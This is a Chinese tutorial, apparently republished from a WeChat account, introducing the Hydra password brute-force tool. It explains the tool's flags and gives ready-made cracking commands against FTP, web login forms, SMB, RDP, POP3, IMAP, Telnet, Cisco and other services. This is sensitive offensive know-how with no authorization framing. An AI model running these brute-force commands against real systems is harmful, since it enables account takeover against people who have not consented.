专栏首页HACKWAY密码破解神器Hydra初识

密码破解神器Hydra初识

简介

每个密码安全研究显示表明,最大的安全漏洞之一是密码。而九头蛇是一个并发的登录破解程序,支持许多协议攻击。新模块更容易添加,除此之外,Hydra是灵活和迅速的,且非常容易上手操作

支持如下协议:

Asterisk,AFP,CiscoAAA,Ciscoauth,Ciscoenable,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,
HTTP-GET,HTTP-HEAD,HTTP-POST,HTTP-PROXY,HTTPS-FORM-GET,HTTPS-FORM-POST,HTTPS-GET,HTTPS-POST,HTTPS-HEAD,
HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,OracleListener,OracleSID,Oracle,
PC-Anywhere,PCNFS,POP3,POSTGRES,RDP,Rexec,Rlogin,Rsh,RTSP,S7-300,SAP/R3,SIP,SMB,SMTP,
SMTPEnum,SNMP,SOCKS5,SSH(v1andv2),Subversion,Teamspeak(TS2),Telnet,VMware-Auth,VNCandXMPP.

可以覆盖了暴力破解的大部分协议需求,可以到Github上查看你下载[1],也可以参考入门手册[2],及参考文章[3]

命令参数

# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

-R
继续从上一次进度接着破解

-S
大写,采用SSL链接

-s <PORT>
小写,可通过这个参数指定非默认端口

-l <LOGIN>
指定破解的用户,对特定用户破解

-L <FILE>
指定用户名字典

-p <PASS>
小写,指定密码破解,少用,一般是采用密码字典

-P <FILE>
大写,指定密码字典

-e <ns>
可选选项,n:空密码试探,s:使用指定用户和密码试探

-C <FILE>
使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

-M <FILE>
指定目标列表文件一行一条

-o <FILE>
指定结果输出文件

-f
在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

-t <TASKS>
同时运行的线程数,默认为16

-w <TIME>
设置最大超时的时间,单位秒,默认是30s

-v / -V
显示详细过程

server
目标ip

service
指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等

OPT
可选项

实战案例

  1. 破解ftp
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
  1. get方式提交,破解web登录
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
  1. post方式提交,破解web登录 该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:
<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>

假设有以上登录表单,我们的执行命令如下:

hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

  后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义
  1. 破解https
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
  1. 破解teamspeak
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
  1. 破解cisco
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
  1. 破解smb
hydra -l administrator -P pass.txt 10.36.16.18 smb
  1. 破解pop3
hydra -l muts -P pass.txt my.pop3.mail pop3
  1. 破解rdp
hydra ip rdp -l administrator -P pass.txt -V
  1. 破解http-proxy
hydra -l admin -P pass.txt http-proxy://10.36.16.18
  1. 破解imap
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
  1. 破解telnet
hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

参考资料

[1]

git仓库地址: "https://github.com/vanhauser-thc/thc-hydra"

[2]

Hydra入门手册: "https://www.freebuf.com/column/152404.html"

[3]

参考文章: "https://www.cnblogs.com/ECJTUACM-873284962/p/7805116.html"

为你铺好的HACKWAY

长按扫码上车

你点的每个在看,我都认真当成了喜欢

本文分享自微信公众号 - HACKWAY(gh_7a5a315cde00),作者:HACKWAY

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-08-15

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Upload-labs通关笔记(四)

    首先在burp中不断发送上传webshell的数据包,然后不断在浏览器中访问,发现通过竞争可以访问到。

    轩辕小子
  • Windows全版本提权工具

    最近新出的一个windows全版本通杀的提权exp(CVE-2020-0787)亲测真香,推荐大家使用,直接上地址

    轩辕小子
  • Sqlilabs通关笔记(二)

    该注入原理可以查找资料,注入方式的有资料[1]可以点击查看,如下只列举常遇到的十种报错注入的方式

    轩辕小子
  • 通过Hydra在线检测服务器安全

    如何防范密码被暴力破解就需要了解黑客如何暴力破解你的服务器的。本节来介绍一下Hydra(“九头蛇”)黑客工具(官网:https://www.mh-sec.de/...

    研究僧
  • 暴力登录破解密码工具-Hydra

    Hydra((海德拉/九头蛇)是一个支持多种网络服务的非常快速的网络登陆破解工具;支持AFP, Cisco AAA, Cisco auth, Cisco ena...

    以谁为师
  • 关于防CSRF你需要了解的另一种方法

    网站通常会使用 cookie来记录用户的登录状态,但并非安全,因为 cookie被允许在第三方网站(也不仅限于第三方)发起的请求中携带,因此利用这一点可以达到 ...

    IMWeb前端团队
  • PHP包管理工具Composer概念使用方法

    概念 Composer是 PHP 用来管理依赖(dependency)关系的工具。在项目中声明所依赖的外部工具库(libraries),Composer 会安装...

    Clive
  • CentOS7/Redhat7破解Root密码(linux)

    在我们学习Linux中,破解Root密码也许并不是最常使用的一个技能,但如果需要破解时再来学习可能就晚了。以至于红帽认证考试中的第一项就是Root密码的破解,因...

    Weiyang
  • jasmine没有调用fixture.detectChanges就取不到元素的原因

    如果没有调用fixture.detectChanges, element context的innerHTML里根本就看不到button的源代码:

    Jerry Wang
  • 天天算法 LeetCode-101-对称二叉树

    https://leetcode-cn.com/problems/symmetric-tree/

    FunTester

扫码关注云+社区

领取腾讯云代金券